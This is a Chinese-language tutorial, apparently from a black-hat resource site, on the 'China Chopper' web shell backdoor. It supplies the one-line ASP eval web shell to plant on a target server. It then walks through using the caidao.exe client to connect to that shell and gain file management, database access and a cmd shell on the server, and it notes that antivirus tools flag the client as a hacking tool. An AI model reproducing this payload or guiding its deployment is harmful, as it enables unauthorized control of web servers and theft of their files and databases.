中国菜刀

“中国菜刀”是一款由台湾技术大牛开发的web shell后门; 只论技术性,“中国菜刀”,配置简便、功能强大、使用方便,可以说是一款强大好用的“web管理工具”。

中国菜刀”是一款由台湾技术大牛开发的web shell后门;

只论技术性,“中国菜刀”,配置简便、功能强大、使用方便,可以说是一款强大好用的“web管理工具”。

以下以ASP形式介绍“中国菜刀”使用方法,PHP、aspx形式类似。


1、获取“中国菜刀”安装介质

可从“中国菜刀”官网下载;目前,主流安全类软件(如:防病毒类软件、终端安全类软件)都会将“中国菜刀”视作黑客攻击类工具、而进行隔离;

因此,建议在虚拟机环境中使用“中国菜刀”;在使用时,建议将虚拟机网络设置为“主机专用网”方式、与其他网络隔离、确保安全。


2、目标环境配置

在目标环境中配置".asp"格式文件,例如“caidao.asp”,输入内容如下:

<%eval request("管理口令")%>


3、客户端使用

(1)双击打开“中国菜刀”的运行主程序:caidao.exe

(2)在主程序界面中右击选择“添加”,见下图:

中国菜刀  第1张

(3)添加Shell

在“地址”中输入目标环境的asp页面地址,如:1.1.1.1/caidao.asp

在密码框中输入目标环境中配置的口令;

“脚本类型”选择“asp”;

参见下图:

中国菜刀  第2张

(4)shell选择

连接成功后,共有3种shell可使用:文件管理、数据库管理、虚拟终端,

  • 文件管理:即“资源管理器”,可对web服务器所在分区的各种资源进行管理;

  • 数据库管理:即“数据库客户端”,可对web后台数据库进行管理;

  • 虚拟终端:获得web服务器的cmd shell。

参见下图:

中国菜刀  第3张

(5)“文件管理”shell示例参见下图:

中国菜刀  第4张

(6)“数据管理”shell

完成配置后,可尝试连接数据库,配置过程参见以下图:

中国菜刀  第5张
中国菜刀  第6张
中国菜刀  第7张
中国菜刀  第8张

连接数据库成功后,可输入SQL语句进行使用,参见下图:

中国菜刀  第9张


好码网 - SEO黑帽站群程序分享网。 《www.Haoma5.com》
转载请说明《好码网_Haoma5.com》
好码网 » 中国菜刀

发表评论

欢迎 访客 发表评论

一个专注于资源分享的网站

黑帽资源 网站源码